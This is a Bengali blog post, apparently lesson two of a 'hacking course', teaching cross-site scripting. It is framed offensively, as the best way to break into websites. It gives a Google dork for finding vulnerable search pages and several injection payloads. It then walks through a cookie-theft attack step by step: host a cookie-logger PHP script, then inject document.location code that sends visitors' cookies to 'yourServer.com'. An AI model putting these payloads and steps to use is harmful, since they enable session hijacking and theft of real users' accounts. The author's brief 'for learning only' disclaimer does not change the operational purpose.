সাগ্বতম! আপনাকে হ্যাকিং শিক্ষা কোর্স দ্বিতীয় পর্বে!
যার যারা প্রথম পর্ব দেখেন নি তারা এখান থেকে দেখে নিন প্রথম পর্বঃ- অথবা, নিচে থেকে সরাসরি দেখুন
আজকের পর্বের বিষয়ঃ- XSS (Crose Site Scrioting)
XSS কি? XSS একটি সংক্ষিপ্ত শব্দ, এর পূর্ণরূপ হল Cross Site Scripting. এটি application-layer web attacks এর সবচেয়ে জনপ্রিয় একটি ম্যাথড। সাধারণত বিভিন্ন বড় বড় সাইট হ্যাকিং করতে এই ম্যাথডটি সবচেয়ে বেশি ব্যবহৃত হয়। একটি ওয়েবসাইটের নিরাপত্তা ভাঙ্গার এটিই হল সবচেয়ে ভাল পদ্ধতি। 😈
XSS attack দিয়ে একজন হ্যাকার তার ভিকটিমের ক্লায়েন্ট সাইড স্ক্রিপ্টের আসল ওয়েব পেজ সংক্রমিত করে। যখন একজন ভিজিটর আপনার ওয়েবসাইট ভিজিট করে, তখন script টি স্বয়ংক্রিয়ভাবে ভিজিটরের ব্রাউজারে ডাউনলোড হয়।
XSS Vulnerabilities খুঁজে বের করাঃ-একটি ওয়েবসাইটের vulnerabilities খুঁজে বের করার জন্য আপনি সহযোগিতা নিতে পারেন Blogs, Forums, Shoutboxes, Comment Boxes, Search Box’s ও অন্যান্য যে কোন কিছুর। এছাড়াও আপনি Google Dorks দিয়েও আপনি ওয়েবসাইটের ভ্যলু বের করে নিতে পারেন। আর যদি আপনি carking করতে না পারেন, তাহলে গুগলে যান ও নিচের ডকটি লিখে এন্টার করুন।
inurl:"search.php?q=" তাহলে আপনি অনেক গুলো ফলাফল পেয়ে যাবেন। 😯
XSS প্রাথমিক আলোচনাঃ- XSS এর বেসিক জিনিসগুলো জানতে প্রথমে একটি ছবি দেখতে হবে।
Xss injection এ সবচেয়ে বেশি যে কোডটি ব্যবহৃত হয়, সেটা হল <script>alert("XSS")</script>
এতক্ষন দেখলাম XSS এর কাজ করার পদ্ধতি। এখন এর কয়েকটি জনপ্রিয় ম্যাথড দেখব ! 😛
<html><body><IMG SRC="http://site.com/hacked.cyberking"></body></html> এছাড়াও আপনি আরেকটি কাজ করতে পারবেন IMG SCR এটা হল তাদের জন্য যারা HTML জানেন না তাদের জন্য। IMG SCR হল একটি ট্যাগ, এখানে দেয়া ছবিটি লিংক ওয়েবপেজে দেখাবে। এখন আমরা Shoutbox, Comment box বা যে কোন কিছু খুঁজে পেলাম। যা আপনার সাবমিট করাডাটাটি ওয়েবপেইজে দেখাবে। তবে এটা করলে আপনার ওয়েবপেজে শুধু মাত্র ছবির লিংকটি দেখাবে। <IMG SRC=""http://site.com/vuthBaba.png">তবে এটা করলে আপনার দেয়া ছবিটি ওয়েবপেজে বড় দেখাবে। এছাড়া আরেকটি ম্যাথড হল FLASH ভিডিও। <EMBED SRC="http://site.com/TJUnselected.swf"এবার একটি পপ-আপ দিন <script>window.open("http://www.site")</script>।
প্রথমে আপনাকে একটি cookie stealer নিতে হবে। এর জন্য এখানে যান। এবার এটি কে সেভ করুন। আপনি একটি .php ফাইল খুঁজে পাবেন। এটি একটি ওয়েব সার্ভারে আপলোড করুন। এবং মনে রাখবেন অবশ্যই ‘log.txt’ নামে একটি ফাইল তৈরি করবেন ও একে 777 এ chmod করুন।।নোটঃ chmod হল একটি Unix command যা আপনাকে একটি সিস্টেমের প্রবেশাধিকার সম্পর্কে জানাবে। এবার একটি XSS vulnerable website খুঁজে বের করুন। পাওয়া গেলে আপনি এখন আপনার কোডটি প্রবেশ করাবেন। window.location = "http://yourServer.com/cookielogger.php?c="+document.cookie
অথবা:-
document.location = "http://yourServer.com/cookielogger.php?c="+document.cookieএবার যখনই ভিজিটর রা আপনার সাইটটি ভিজিট করবে তখনই এটি তাদের কুকিগুলো চুরি করে রেখে দিবে। এখন আমরা কুকি নিয়ে নিব।http://site.com/search.php?q=document.location = “http://yourServer.com/cookielogger.phpc=”+document.cookie 👿
আরো কিছু থাকলে মন্তভ্য এর মাধ্যমে জানবেন। ক্রেডিট ➡ Click Here 💡
উপদেশঃ– হ্যাকিং জানার জন্য শিখে রাখুন। কার ক্ষতি করার জন্য নয়। হ্যা কোথায় কিছু অন্যায় ভাবে করলে সমস্যা হলে লেখক দায়ী নয়। নিজ দ্বায়িতে করুন। 👿 হ্যাকিং নিয়ে যে কোন প্রশ্ন করুনঃ- arrow: এখানে
প্রথম প্রাকাশিতঃ- এখানে, হ্যাকিং নিয়ে সম্পূর্ণ কোর্স পেতে এখানে ক্লিক করুন
যোগাযোগ করুনঃ- V43H B441 (রিকুয়েস্ট দিলে মেসেজ দিবেন নাইলে এক্সপেট হবার ভরসা নাই)
অপেক্ষা করুন ৩য় পর্ব পর্যন্ত ➡
জনস্বার্থে, গ্রীন হ্যাট হ্যকার’স (:arrow: ফ্যান পেইজ) (:arrow: অফিসিয়াল গ্রুপ)
All Right Receved:- Green INC team
আমি আমি একজন ভাল ছেলে। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 9 বছর 6 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 18 টি টিউন ও 30 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 0 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।
কিছু নাই